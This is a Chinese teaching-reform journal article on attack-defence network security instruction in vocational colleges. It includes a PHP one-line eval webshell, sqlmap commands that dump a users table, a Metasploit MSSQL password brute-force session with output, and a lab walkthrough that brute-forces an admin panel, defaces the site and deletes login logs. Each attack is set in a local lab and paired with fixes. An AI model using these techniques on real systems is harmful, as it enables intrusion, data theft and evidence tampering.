摘? 要:職業(yè)院校如何有效培養(yǎng)網(wǎng)絡(luò)安全滲透和網(wǎng)絡(luò)安全防范綜合性應(yīng)用人才,探索網(wǎng)絡(luò)安全技術(shù)課程攻防一體化教學(xué)設(shè)計與應(yīng)用具有重要意義。本文從網(wǎng)絡(luò)安全課程教學(xué)中存在的突出問題出發(fā),提出攻防一體化教學(xué)設(shè)計思路,有效破解教學(xué)難題。通過網(wǎng)絡(luò)滲透模塊設(shè)計和綜合實踐,提升學(xué)生的專業(yè)動手能力,強(qiáng)化攻防一體化教學(xué)的重要性。通過網(wǎng)絡(luò)滲透技術(shù)教學(xué),促進(jìn)網(wǎng)絡(luò)安全防護(hù)工作,做到以攻助防,攻防結(jié)合。
關(guān)鍵詞:網(wǎng)絡(luò)安全;滲透技術(shù);一體化教學(xué);教學(xué)改革
中圖分類號:TP39;G434? ? 文獻(xiàn)標(biāo)識碼:A? ? 文章編號:2096-4706(2023)10-0166-05
Abstract: It is of great significance for vocational colleges to effectively cultivate comprehensive application talents of network security penetration and network security prevention, and explore the integrated teaching design and application of attack-defense integration of network security technology courses. Starting from the prominent problems in the teaching of network security course, this paper puts forward the idea of attack-defense integration teaching design to effectively solve the teaching problems. Through the network penetration module design and comprehensive practice, it improves students' professional hands-on ability, and strengthens the importance of attack-defense integration teaching. Through the teaching of network penetration technology, it promotes the work of network security protection, and achieves the combination of attack and defense.
Keywords: network security; infiltration technology; integrated teaching; reform in education
0? 引? 言
隨著信息化高速發(fā)展與廣泛應(yīng)用,網(wǎng)絡(luò)安全問題凸顯,網(wǎng)絡(luò)安全綜合應(yīng)用型人才缺乏,職業(yè)院校被賦予培養(yǎng)專業(yè)技術(shù)技能人才的重要使命。如何有效破解網(wǎng)絡(luò)安全課程教學(xué)的難題,探討培養(yǎng)符合社會發(fā)展相適應(yīng)的技能型人才和攻防綜合型人才具有十分重要意義。在遵守國家法律法規(guī)的前提下,要科學(xué)設(shè)計好教學(xué)內(nèi)容,開展攻防練習(xí),做到攻防一體化教學(xué),提升學(xué)生的攻防動手能力。
1? 教學(xué)存在的難題
1.1? 老師怕交學(xué)生難學(xué)
網(wǎng)絡(luò)安全技術(shù)是一門實用性、操作性極強(qiáng)的技術(shù),但使用不當(dāng)可能會導(dǎo)致負(fù)面影響,甚至觸犯法律?!吨腥A人民共和國網(wǎng)絡(luò)安全法》及相關(guān)法律法規(guī)成為網(wǎng)絡(luò)安全課程的必修課,合理引導(dǎo)學(xué)生正確使用網(wǎng)絡(luò)安全滲透技術(shù),成為網(wǎng)絡(luò)安全課程的重要內(nèi)容。而學(xué)生渴望馬上能夠動手滲透實戰(zhàn)技術(shù),老師交與學(xué)生學(xué)渴望不一致,老師害怕學(xué)生犯錯誤,學(xué)生迫不及待想展示技能,焦距點不一致。
1.2? 網(wǎng)絡(luò)安全教學(xué)攻防平臺建設(shè)及使用困難
網(wǎng)絡(luò)安全課程對實戰(zhàn)演練平臺要求較高,實戰(zhàn)演練一般都在虛擬環(huán)境里進(jìn)行。學(xué)校建設(shè)網(wǎng)絡(luò)安全實驗室和實驗環(huán)境建設(shè)投入經(jīng)費多,資源更新快,對網(wǎng)絡(luò)安全技術(shù)人才要求較高,要求具備扎實專業(yè)知識和正確的價值觀,能夠勝任攻防一體教學(xué)的綜合性人才。而大部分高校在網(wǎng)絡(luò)安全實訓(xùn)室和攻防平臺建設(shè)投入邂逅,網(wǎng)絡(luò)安全專業(yè)人才缺乏,實戰(zhàn)能力不足,不滿足學(xué)生的預(yù)期的愿望。
1.3? 只重視攻忽略防
網(wǎng)絡(luò)安全滲透測試的目的在于查找漏洞,做到知彼知己,百戰(zhàn)不殆,有利做好網(wǎng)絡(luò)安全防護(hù)工作。在實際教學(xué)中,重視滲透測試,忽略安全策略防范,學(xué)生容易誤解,走向誤區(qū)。在畢業(yè)工作實踐中,網(wǎng)絡(luò)滲透只是一方面,而網(wǎng)絡(luò)安全防護(hù)才是主要任務(wù)。
2? 攻防一體化教學(xué)設(shè)計
2.1? 信息采集技術(shù)
在網(wǎng)絡(luò)安全滲透測試過程中,要全面掌握滲透對象的基本信息,做到知彼知己,百戰(zhàn)不殆。信息的采集包括收集域名備案信息,系統(tǒng)的敏感信息,系統(tǒng)的版本信息,開放服務(wù)及端口信息,敏感目錄信息等,收集信息有利于開展?jié)B透測試。在課程教學(xué)設(shè)計中,要針對性設(shè)計信息采集技術(shù),常用端口及滲透利用方向如表1所示。
2.2? 攻防實戰(zhàn)平臺搭建
在網(wǎng)絡(luò)安全技術(shù)課程教學(xué)中,攻防教學(xué)演練平臺十分重要,也是教師上網(wǎng)絡(luò)安全課程的難題。建設(shè)和購置網(wǎng)絡(luò)安全攻防平臺,費用較高,網(wǎng)絡(luò)安全實戰(zhàn)教程技術(shù)落后,不滿足教學(xué)和實戰(zhàn)演練的需要。自主搭建網(wǎng)絡(luò)安全攻防平臺,可以節(jié)約大量的建設(shè)成本,同時讓學(xué)生在搭建環(huán)境中學(xué)習(xí)平臺搭建過程,提高自主駕馭平臺的能力。
DVWA是一個基于PHP和MySQL開發(fā)的漏洞測試平臺,是網(wǎng)絡(luò)安全攻防學(xué)習(xí)的常用漏洞測試平臺。對于初學(xué)者來說,可以選擇Windows系統(tǒng),通過安裝應(yīng)用程序phpStudy(apache,php,MySQL)便于快速部署dvwa,部署完成后通過測試程序firefox、new hacker、burpsuite、SQLmap、中國菜刀等常用安全測試工具開展攻防實驗。下載DVWA解壓到phpStudy的Web目錄,修改數(shù)據(jù)庫配置并保存,然后訪問地址http://localhost/DVWA-1.9,在顯示頁面中點擊create/reset database進(jìn)行數(shù)據(jù)庫初始化,默認(rèn)賬號為admin,密碼為password。DVWA分四個安全級別,可以通過頁面進(jìn)行設(shè)置,四個安全級別分別為low、medium、high、impossible,其中l(wèi)ow安全級別低,沒有任何安全措施,容易受到攻擊;medium安全級別中,嘗試提供安全措施,但未能保護(hù)應(yīng)用程序,為不良的安全實踐;high安全級別高,嘗試提供混合的更難或者替換的安全措施保護(hù)代碼,漏洞利用難度,類似于CTF;impossible:安全的默認(rèn)級別;在教學(xué)過程中,老師可以根據(jù)學(xué)生情況和教學(xué)進(jìn)度設(shè)置安全級別,不斷提高漏洞檢測能力。
2.3? Web安全滲透測試技術(shù)教學(xué)設(shè)計
談到Web安全不得不談的是在2017年發(fā)布了影響Web應(yīng)用的十大安全風(fēng)險,這些安全風(fēng)險提醒我們要高度重視Web安全,在軟件開發(fā)過程中,要避免代碼漏洞給用戶帶來的安全隱患,要進(jìn)一步弄明白漏洞利用過程,努力提高了Web應(yīng)用系統(tǒng)的安全性。
2.3.1? XSS攻擊
XSS跨站腳本攻擊是網(wǎng)絡(luò)攻擊者制定惡意代碼程序,通過某些技術(shù)將惡意代碼注入到校園網(wǎng)站中,當(dāng)客戶正常打開網(wǎng)站時,就啟動了惡意代碼,執(zhí)行預(yù)定的惡意程序,破壞學(xué)校軟件和硬件資源,達(dá)到預(yù)定的目的。如入侵者把惡意代碼注入到網(wǎng)站中,當(dāng)用正常打開網(wǎng)站和執(zhí)行身份驗證操作時,攻擊者就可以獲取相關(guān)賬戶信息,獲得相關(guān)登錄權(quán)限,然后對網(wǎng)站進(jìn)行篡改和相關(guān)操作,掛載木馬,獲取相關(guān)敏感信息,破壞系統(tǒng),從而攻擊者達(dá)到其攻擊的目的。
反射型XSS漏洞場景:將前端獲取的內(nèi)容,直接輸出到瀏覽器頁面,后端代碼:<?php $content=$_GET[data]; echo $content;?>,通過直接訪問http://127.0.0.1/sdcsfecatrtyg/xss.php?data=123456789,結(jié)果如圖1所示。
上述結(jié)果是對客戶端輸入的內(nèi)容沒有做任何過濾的,接下來是直接構(gòu)造攻擊語句實現(xiàn)對html頁面注入。攻擊語句,前端輸入:http://loaclhost/sdcsfecatrtyg/xss.php?data=測試效果如圖2所示。
修復(fù)建議:對客戶端用戶輸入提交到Web服務(wù)器的參數(shù)進(jìn)行轉(zhuǎn)義或過濾。
2.3.2? SQL注入攻擊
SQL注入攻擊是在軟件發(fā)過程中,程序員對SQL語句沒有嚴(yán)格過濾和處理,入侵者通過構(gòu)造SQL語句,并執(zhí)行相應(yīng)操作,就能成功獲得數(shù)據(jù)庫、表、用戶權(quán)限等信息,然后登錄數(shù)據(jù)庫和信息系統(tǒng)后臺,任意操作和篡改數(shù)據(jù)。
SQL注入漏洞帶來的危害主要有數(shù)據(jù)信息泄露、數(shù)據(jù)的篡改,Web網(wǎng)站頁面內(nèi)容被惡意篡改或掛木馬。
SQL注入漏洞場景:在本地搭建漏洞平臺:主要環(huán)境是基于Windows 10系統(tǒng),搭建apache服務(wù),安裝MySQL 5.6和php5.6,構(gòu)造PHP頁面并存在SQL注入,漏洞注入界面如圖3所示。
如圖4所示,使用SQLmap漏洞檢測工具,測試語句:sqlmap -u "http://127.0.0.1/akcklw85sql.php?name=11&submit=%E6%9F%A5%E8%AF%A2"得到數(shù)據(jù)庫的版本,接下來繼續(xù)深入挖掘,得到所有數(shù)據(jù)庫名。測試語句為sqlmap -u "http//127.0.0.1/akcklw85sql.php?name=11&submit=%E6%9F%A5%E8%AF%A2" --dbs
如圖5所示,成功獲得數(shù)據(jù)庫名稱后,在獲取數(shù)據(jù)庫里users表里面的數(shù)據(jù),包含用戶名及密碼,參考語句為sqlmap -u "http://127.0.0.1/akcklw85sql.php?name=11&submit=%E6%9F%A5%E8%AF%A2"-D pi -T users --dump
SQL注入防范要點:建議盡量過濾掉邏輯 and 符號、分號、美元符號、百分比符號、尖括號、單引號、雙引號、反斜杠轉(zhuǎn)義單引號、回車符、反斜杠、豎線符號、@符號等特殊符號。
2.3.3? DDoS拒絕服務(wù)攻擊
DDoS拒絕服務(wù)就是指網(wǎng)站或者服務(wù)器對外停止服務(wù),攻擊者通過技術(shù)手段把服務(wù)器的資源耗盡,用戶無法正常打開訪問網(wǎng)站或服務(wù)器。例如你開了一家餐廳,生意還可以。此時,你的同行小西盯上了你(黑客攻擊者),于是她找來了一群鬧事的人(非法控制的肉雞)。緊接著,你會突然發(fā)現(xiàn)店里面來了一大群客人(異常流量惡意訪問),而且他們到店里,不吃東西,堵著店門,占著位置,賴著不走了,造成了資源的浪費。而真正的顧客想消費的連進(jìn)店的地方都沒有了,這就是所謂的DDoS攻擊。DDoS攻擊的危害表現(xiàn)為服務(wù)器內(nèi)存資源耗盡、服務(wù)器死機(jī)。
DDoS攻擊修復(fù)建議:一是及時安裝操作系統(tǒng)補(bǔ)丁,避免系統(tǒng)漏洞導(dǎo)致攻擊;二是部署負(fù)載均衡策略,合理規(guī)劃流量的走向。
2.3.4? 弱口令攻擊
弱口令是一種過于簡單密碼,入侵者能夠根據(jù)數(shù)字和字母隨機(jī)組合,通過密碼字典多線程進(jìn)行密碼匹配,能快速破解成功的密碼。常見的弱口令有“12345678”“qwer”等,因為這樣的密碼大部分是設(shè)備和系統(tǒng)默認(rèn)密碼,密碼簡單,容易被人猜測,從而使計算機(jī)隨時都處于一個風(fēng)險危險的狀態(tài)。
弱口令修復(fù)建議:一是設(shè)置密碼安全策略,限制登錄次數(shù),密碼鎖定策略;二是設(shè)置強(qiáng)口令,通過技術(shù)手段強(qiáng)制密碼的復(fù)雜程度,密碼至少8位以上,必須由大小字母、特殊字符、數(shù)字組成,確保密碼的復(fù)雜程度;三是關(guān)閉不必要和長期不適用的賬戶。
2.3.5? 邏輯漏洞
邏輯漏洞是由于軟件系統(tǒng)開發(fā)過程中,系統(tǒng)邏輯分析不清楚,在數(shù)據(jù)流設(shè)計過程中不夠嚴(yán)謹(jǐn),導(dǎo)致系統(tǒng)邏輯漏洞。入侵者利用這個邏輯漏洞獲取權(quán)限,達(dá)到非法獲取信息和資源,給系統(tǒng)帶來嚴(yán)重威脅。具體實現(xiàn)過程如下:首先發(fā)現(xiàn)一個存在修改密碼的頁面,其次進(jìn)行修改密碼,需要提交注冊郵箱(這個郵箱是通過盲目瞎猜的),然后發(fā)送一下驗證碼,并且隨意填寫驗證碼。點擊下一步后,抓取服務(wù)器的返回包,將false修改為true;0修改為1,然后發(fā)送返回包。成功回到頁面即可看到頁面已成功繞過郵箱驗證,進(jìn)入到了修改密碼的步驟。
邏輯漏洞修復(fù)建議:在軟件系統(tǒng)開發(fā)過程中,明確邏輯關(guān)系,加強(qiáng)對軟件功能和性能的測試,優(yōu)化程序。
2.3.6? 文件上傳漏洞
上傳文件功能在學(xué)校應(yīng)用較多,比如學(xué)生交作業(yè),老師傳教學(xué)資料。但是,如果程序員在開發(fā)上傳文件功能中文件格式限制不嚴(yán)格,沒有做相關(guān)的過濾,用戶可以上傳任意文件,如用戶上傳一張帶有惡意代碼的圖片,這些惡意代碼就可以獲得執(zhí)行服務(wù)器調(diào)用終端命令(bash/cmd/powershell)的能力,然后獲得文件服務(wù)的相關(guān)操作權(quán)限,這是一件非常危險的事情。通過中國菜刀連接一句話木馬<?php eval($_POST[tfy]);?>,每一個功能的操作都是通過post方式進(jìn)行執(zhí)行代碼給一句話木馬,當(dāng)一句話木馬接收到菜刀提交過來的數(shù)據(jù),通過eval函數(shù)在目標(biāo)服務(wù)器上執(zhí)行,從而實現(xiàn)了控制目標(biāo)服務(wù)器。
文件上傳漏洞修復(fù)建議:限制上傳文件的類型,加強(qiáng)文件的安全檢測。
2.4? kaill滲透測試在教學(xué)中的應(yīng)用
2.4.1? NMAP工具的應(yīng)用
NMap(Network Mapper)是Linux下的網(wǎng)絡(luò)掃描和嗅探工具包,Nmap是一款網(wǎng)絡(luò)掃描和主機(jī)檢測的非常有用的工具。Nmap是不局限于僅僅收集信息和枚舉,同時可以用來作為一個漏洞探測器或安全掃描器,它可以適用于winodws、linux、mac等操作系統(tǒng)。其基本功能有三個:一是掃描主機(jī)端口,嗅探所提供的網(wǎng)絡(luò)服務(wù);二是是探測一組主機(jī)是否在線;三是還可以推斷主機(jī)所用的操作系統(tǒng),到達(dá)主機(jī)經(jīng)過的路由,系統(tǒng)已開放端口的軟件版本,Nmap常用的掃描命令如表2所示。
2.4.2? MSF模塊的應(yīng)用
MSF模塊是一個免費的、可下載的框架,通過它可以很容易地獲取、開發(fā)并對計算機(jī)軟件漏洞實施攻擊。它本身附帶數(shù)百個已知軟件漏洞的專業(yè)級漏洞攻擊工具,是教師開展網(wǎng)絡(luò)安全滲透測試的實用工具。如數(shù)據(jù)庫爆破場景設(shè)計,通過滲透測試平臺對服務(wù)器進(jìn)行數(shù)據(jù)庫服務(wù)超級管理員口令暴力破解,使用滲透測試平臺中的字典文件superdic.txt,關(guān)鍵代碼如下:
msf > use auxiliary/scanner/mssql/mssql_login? #實用數(shù)據(jù)庫爆破模塊
msf> auxiliary(mssql_login) > set username sa#設(shè)置數(shù)據(jù)庫用戶名為sa
msf> auxiliary(mssql_login) > set pass_file/usr/share/wordlists/metasploit/superdic.txt#設(shè)置爆破密碼字典文件
msf> auxiliary(mssql_login) > run#開始爆破
[+] 192.168.28.131:1433? ?- 192.168.28.131:1433 - LOGIN SUCCESSFUL: WORKSTATION\sa:123456#成功獲得數(shù)據(jù)庫密碼
3? 網(wǎng)絡(luò)滲透測試綜合實踐
在網(wǎng)絡(luò)安全實踐教學(xué)中,要設(shè)計網(wǎng)絡(luò)安全技術(shù)綜合應(yīng)用實踐模塊教學(xué),加強(qiáng)對網(wǎng)絡(luò)安全技術(shù)的應(yīng)用,網(wǎng)絡(luò)安全工具的應(yīng)用,熟悉滲透測試流程,學(xué)會事前、事中、事后的安全處理,優(yōu)化網(wǎng)絡(luò)安全防范策略,達(dá)到攻防一體化的教學(xué)目的。
3.1? 滲透流程
以某單位門戶網(wǎng)站滲透測試為例,一是要明確滲透測試目標(biāo),滲透對象是服務(wù)器系統(tǒng)和是網(wǎng)站,明確滲透測試方法和適用工具,為滲透測試做準(zhǔn)備。二是收集目標(biāo)對象相關(guān)信息,如網(wǎng)站的敏感目錄,后臺登錄地址,分析網(wǎng)站結(jié)構(gòu),了解網(wǎng)站的開發(fā)語言等信息。三是漏洞挖掘,通過滲透測試平臺和相關(guān)工具全面了解網(wǎng)站及服務(wù)器開放的服務(wù)及端口信息,系統(tǒng)的類型和服務(wù)的版本信息,對照官方網(wǎng)站公布的漏洞信息表查找漏洞,挖掘有用的信息便于開展?jié)B透工作。四是漏洞利用,在前面收集和掌握目標(biāo)對象漏洞信息的基礎(chǔ)上,部署好相關(guān)滲透測試工具,嘗試安全滲透,找到滲透關(guān)鍵點和突破點。五是滲透實踐,開展?jié)B透測試實踐,熟悉安全工具的應(yīng)用,提升用戶權(quán)限,達(dá)到控制網(wǎng)站及服務(wù)器的目的,同時清理日志及痕跡。六是開展?jié)B透總結(jié)工作,讓學(xué)生總結(jié)滲透測試成功或者失敗的原因,便于能夠舉一反三。七是合理制定安全防護(hù)的策略和方法,網(wǎng)絡(luò)滲透的目的是查找漏洞點,幫助用戶加強(qiáng)網(wǎng)絡(luò)安全防護(hù)工作,避免再次受到黑客攻擊,滲透測試流程如圖6所示。
3.2? 滲透步驟
一是搭建網(wǎng)絡(luò)安全滲透測試環(huán)境。本次滲透在局域網(wǎng)內(nèi)虛擬環(huán)境中進(jìn)行,需要在虛擬機(jī)中安裝windows server 2019服務(wù)器,部署滲透測試網(wǎng)站。同時準(zhǔn)備一臺虛擬電腦用于安裝滲透工具,開展?jié)B透測試。兩臺電腦地址配置同一網(wǎng)段,如服務(wù)器地址為192.168.1.128,攻擊機(jī)地址為192.168.1.129,確保兩臺電腦之間能夠互相通信。如需要用域名訪問網(wǎng)站,需要修改DNS。對于windows系統(tǒng)來說,一般修改C:\Windows\System32\drivers\etc\hosts文件,添加如下記錄192.168.1.128 www.abc.cn,192.168.1.128 abc.cn即可。
二是收集網(wǎng)站后臺登錄地址信息??梢允褂?kbscan-WebPathBrute工具掃描網(wǎng)站,設(shè)置掃描目標(biāo),http://www.abc.cn,點擊切換,選擇字典,類型選擇php,點擊開始,成功找到網(wǎng)站后臺登錄地址http://www.abc.cn/upload/e/admin/index.php。
三是網(wǎng)站漏洞利用。以網(wǎng)站弱口令漏洞為例,通過Burp工具暴力破解后臺密碼,成功獲得后臺登錄賬戶密碼。首先打開網(wǎng)站后臺http://www.abc.cn/upload/e/admin/index.php,同時打開Burp工具,選擇代理,開啟攔截功能。在登錄界面設(shè)置burp,輸入網(wǎng)站用戶名為admin,密碼為任意,如12345。在burp界面選擇12345.右鍵發(fā)送Intuder,點擊攻擊器(Intuder)全部選中清除payload位置,在添加payload,選擇有效負(fù)荷,從文件加載,常用密碼,點擊開始攻擊,直到成功獲得用戶名密碼為止。
四是登錄網(wǎng)站后臺,達(dá)到滲透測試的目的。成功獲取網(wǎng)站后臺賬戶和密碼后,通過登錄界面成功登錄系統(tǒng)后臺,可以對網(wǎng)站圖片進(jìn)行修改,便于觀察網(wǎng)站被篡改后的效果。同時刪除用戶登錄日志,做好痕跡清理。
3.3? 網(wǎng)絡(luò)滲透總結(jié)
通過上述網(wǎng)絡(luò)滲透綜合實踐,讓學(xué)生系統(tǒng)全面的了解網(wǎng)絡(luò)安全滲透全流程,學(xué)會信息收集的方法,漏洞挖掘技巧,漏洞利用和工具的合理使用,使學(xué)生充分認(rèn)識到漏洞可能造成的嚴(yán)重后果,提高學(xué)生的安全防護(hù)意識,加強(qiáng)系統(tǒng)安全的防護(hù)策略,做到攻防一體化學(xué)習(xí)。一是要從網(wǎng)絡(luò)滲透實踐中提升網(wǎng)絡(luò)安全技能水平,通過滲透實戰(zhàn)體驗和感受安全技術(shù)的重要性,提升學(xué)生的學(xué)習(xí)興趣。二是熟練掌握滲透技術(shù)的全流程,能夠核驗系統(tǒng)的安全性,為系統(tǒng)加固提供依據(jù)和遵循。三是引導(dǎo)學(xué)生制定安全防護(hù)策略,做好系統(tǒng)安全的日常防護(hù)工作。如限制網(wǎng)站用戶登錄次數(shù),一般三次賬戶密碼錯誤會鎖定賬戶,密碼設(shè)置要求強(qiáng)密碼,避免弱口令攻擊。網(wǎng)站后臺登錄一般需要動態(tài)的驗證碼,提高網(wǎng)站的安全性。要開啟網(wǎng)站登錄日志和操作日志,發(fā)現(xiàn)異常情況要及時追蹤,迅速處理網(wǎng)站漏洞和BUG,避免被他人利用。
4? 結(jié)? 論
網(wǎng)絡(luò)安全技術(shù)課程實踐性強(qiáng),網(wǎng)絡(luò)安全技術(shù)人才培養(yǎng)要強(qiáng)化實用性教學(xué),既要重要網(wǎng)絡(luò)安全滲透技術(shù),也要強(qiáng)化網(wǎng)絡(luò)安全防護(hù)技術(shù)。攻防一體化教學(xué)有利于提高學(xué)生的學(xué)習(xí)興趣,技術(shù)的實用性得到彰顯,要引導(dǎo)學(xué)生自己搭建網(wǎng)絡(luò)滲透測試環(huán)境,全面掌握網(wǎng)絡(luò)滲透的流程,網(wǎng)絡(luò)滲透主要核心技術(shù),尋找網(wǎng)絡(luò)安全防護(hù)方法,做到以攻助防,攻防結(jié)合。
參考文獻(xiàn):
[1] 于順達(dá),楊寶石.淺談教學(xué)一體化在高職教育中的實現(xiàn)途徑 [J].公關(guān)世界,2022(16):102-103.
[2] 賀云龍.Web應(yīng)用滲透技術(shù)研究及安全防御方案設(shè)計分析 [J].科技創(chuàng)新與應(yīng)用,2022,12(29):189-192.
[3] 田永民.計算機(jī)網(wǎng)絡(luò)攻防滲透技術(shù)研究 [J].無線互聯(lián)科技,2022,19(20):149-151.
[4] 周艷秋.新時代下的高?!队嬎銠C(jī)網(wǎng)絡(luò)安全》課程教學(xué)改革探討 [J].中國新通信,2022,24(21):140-142.
[5] 郭金所.基于實網(wǎng)的攻防平臺設(shè)計研究 [J].信息安全研究,2022,8(9):895-900.
作者簡介:林家全(1987—),男,漢族,貴州桐梓人,講師,本科,研究方向:網(wǎng)絡(luò)安全技術(shù)、網(wǎng)絡(luò)技術(shù)。